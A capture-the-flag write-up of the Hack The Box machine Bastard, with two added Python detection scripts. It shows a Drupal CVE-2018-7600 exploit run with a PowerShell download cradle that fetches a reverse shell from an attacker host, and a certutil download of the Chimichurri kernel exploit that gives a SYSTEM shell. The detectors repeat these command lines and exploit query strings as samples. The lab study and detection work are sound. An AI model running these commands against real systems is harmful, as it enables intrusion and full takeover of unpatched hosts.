Overall Summary
Bastard is a Windows machine from Hack The Box that is vulnerable to RCE through Drupal; privilege escalation can then be accomplished with a kernel exploit because the system is missing patches. Overall, Bastard is an easy machine and it can be exploited in more than one way.
Scanning and Enumeration
A full TCP nmap scan shows three ports open.
Exploitation
Just by searching for vulnerabilities and exploits for Drupal 7.54 I came across https://github.com/pimps/CVE-2018-7600/blob/master/drupa7-CVE-2018-7600.py, a Python exploit for CVE-2018-7600 that allows arbitrary code execution because of an issue with module configurations. The exploit can be run by providing only a URL, but then it executes the command "id" by default; since this is a Windows machine we have to pass the command as a parameter. This is how I executed the script:
python3 drupa7-CVE-2018-7600.py -c "whoami" http://10.10.10.9/
To get a reverse shell I'll use https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1, a PowerShell reverse shell from Nishang. I'll first host the file on my attacking machine using Python's SimpleHTTPServer module, set up my netcat listener on port 443, and finally run the exploit script with a command that downloads and executes the reverse shell. This is the full invocation, with the download-and-execute command passed to the script:
python3 drupa7-CVE-2018-7600.py -c "powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.14.19:80/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.19 -Port 443" http://10.10.10.9/
I was able to successfully get a PowerShell reverse shell.
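From the defender's side, the exploit traffic above leaves a distinctive trace: the Drupal 7 variant of CVE-2018-7600 smuggles Form API render-array keys such as #post_render and #markup into the query string, which a normal visitor never sends. The following Python script is an added example (not part of this write-up or of the exploit project) that scans combined-format web access-log lines for those keys, decoding the URL twice so a double-encoded payload is caught as well; the log lines it contains are constructed samples, not captures from the box.

```python
import re
from urllib.parse import unquote

# Drupal Form API render-array keys abused by CVE-2018-7600. A legitimate
# visitor never sends these as form field names, so their presence in a request
# target is a high-confidence indicator.
RENDER_KEYS = ("#post_render", "#pre_render", "#lazy_builder",
               "#access_callback", "#markup")

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def decode_target(target):
    """URL-decode twice so a double-encoded '#' (%2523) is normalised as well."""
    return unquote(unquote(target))


def drupalgeddon2_indicators(line):
    """Return the render-array keys found in one access-log line (empty if none)."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    decoded = decode_target(match.group("target")).lower()
    return [key for key in RENDER_KEYS if key in decoded]


def scan(lines):
    """Return (line_number, indicators) for every suspicious line."""
    hits = []
    for number, line in enumerate(lines, 1):
        keys = drupalgeddon2_indicators(line)
        if keys:
            hits.append((number, keys))
    return hits


# Constructed sample log lines (not from the original page). Line 1 carries the
# exploit's query string, line 4 the same kind of keys double-encoded; lines 2
# and 3 are ordinary traffic, including a legitimate password-reset page load.
SAMPLE_LOG = [
    '10.10.14.19 - - [01/Jan/2024:12:00:01 +0000] "POST /?q=user/password'
    '&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup'
    '&name%5B%23markup%5D=whoami HTTP/1.1" 200 1234',
    '10.10.14.19 - - [01/Jan/2024:12:00:02 +0000] "GET /node/1 HTTP/1.1" 200 5678',
    '10.10.14.19 - - [01/Jan/2024:12:00:03 +0000] "GET /?q=user/password HTTP/1.1" 200 4321',
    '10.10.14.19 - - [01/Jan/2024:12:00:04 +0000] "GET /?q=user/password'
    '&name%255B%2523lazy_builder%255D%255B%255D=x HTTP/1.1" 200 1234',
]

if __name__ == "__main__":
    for number, keys in scan(SAMPLE_LOG):
        print(f"line {number}: Drupalgeddon2 indicators {keys}")
```

One caveat: access logs only record the request line, so a payload sent purely in a POST body is invisible here; for that, a web application firewall or Drupal's own watchdog log is needed. The real fix is the Drupal 7.58 / 8.5.1 security release, which this box never received.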
Post-Exploitation
I fed the output of the systeminfo command (which is what windows-exploit-suggester.py consumes) to the tool, and it returned a list of candidate exploits.
By going down the list, I was able to get the MS10-059 (Chimichurri) exploit working. The compiled binary can be downloaded from https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri/Compiled. I uploaded this binary to the machine using certutil as follows:
certutil -urlcache -f http://10.10.14.19/Chimichurri.exe Chimichurri.exe
./Chimichurri.exe 10.10.14.19 4321
After a few seconds I was able to successfully get a reverse shell as “nt authority\system”.
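Both file transfers in this write-up (the PowerShell download cradle in the exploitation step and certutil -urlcache in the post-exploitation step) are well-known living-off-the-land patterns that show up verbatim in process-creation telemetry (Sysmon Event ID 1, or Security event 4688 with command-line auditing enabled). The script below is an added example, not part of this write-up, that tags such events; the events are constructed samples, and the assumption that the Drupal site runs under IIS with PHP as a CGI worker (so php-cgi.exe or w3wp.exe is the parent of the first shell) is mine, not something the page states.

```python
import ntpath
import re

# Patterns for the two download techniques used in the write-up. Matching is
# case-insensitive because Windows command lines are.
CERTUTIL_DOWNLOAD = re.compile(
    r"\bcertutil(\.exe)?\b.*[-/]urlcache\b.*\bhttps?://", re.I)
WEBCLIENT_DOWNLOAD = re.compile(
    r"New-Object\s+(System\.)?Net\.WebClient.*\.Download(String|File|Data)\(", re.I)
INVOKE_EXPRESSION = re.compile(r"\b(iex|invoke-expression)\b", re.I)

# Worker processes of common Windows web stacks. A shell or LOLBin with one of
# these as parent usually means code execution through the web application.
# Assumption (not from the page): the Drupal site runs under IIS with PHP as CGI.
WEB_SERVER_WORKERS = {"w3wp.exe", "php-cgi.exe", "httpd.exe"}


def classify(event):
    """Return the detection tags for one process-creation event (empty if benign)."""
    tags = []
    cmd = event.get("CommandLine", "")
    if CERTUTIL_DOWNLOAD.search(cmd):
        tags.append("certutil_urlcache_download")
    if WEBCLIENT_DOWNLOAD.search(cmd):
        tags.append("powershell_download_cradle")
    if INVOKE_EXPRESSION.search(cmd):
        tags.append("powershell_iex")
    # ntpath handles Windows paths correctly even when this runs on Linux.
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    if parent in WEB_SERVER_WORKERS:
        tags.append("spawned_by_web_server")
    return tags


def scan(events):
    """Return (image name, tags) for every event that triggers at least one tag."""
    hits = []
    for event in events:
        tags = classify(event)
        if tags:
            hits.append((ntpath.basename(event.get("Image", "")), tags))
    return hits


# Constructed sample events mirroring the write-up's two transfers plus two
# benign uses of the same binaries.
EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "certutil -urlcache -f http://10.10.14.19/Chimichurri.exe Chimichurri.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\PHP\php-cgi.exe",
     "CommandLine": "powershell iex (New-Object Net.WebClient).DownloadString("
                    "'http://10.10.14.19:80/Invoke-PowerShellTcp.ps1')"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"certutil -hashfile C:\Windows\notepad.exe SHA256"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -Command Get-Process"},
]

if __name__ == "__main__":
    for image, tags in scan(EVENTS):
        print(f"{image}: {', '.join(tags)}")
```

Two notes on the design: the certutil rule keys on the -urlcache switch plus an http(s) URL rather than on certutil itself, so routine certificate and hashing use does not alert; and the parent-process rule is deliberately independent of the command line, because a web worker spawning any shell is worth a look. None of this replaces patching: MS10-059 is a 2010 bulletin, and the privilege escalation here exists only because the update was never installed.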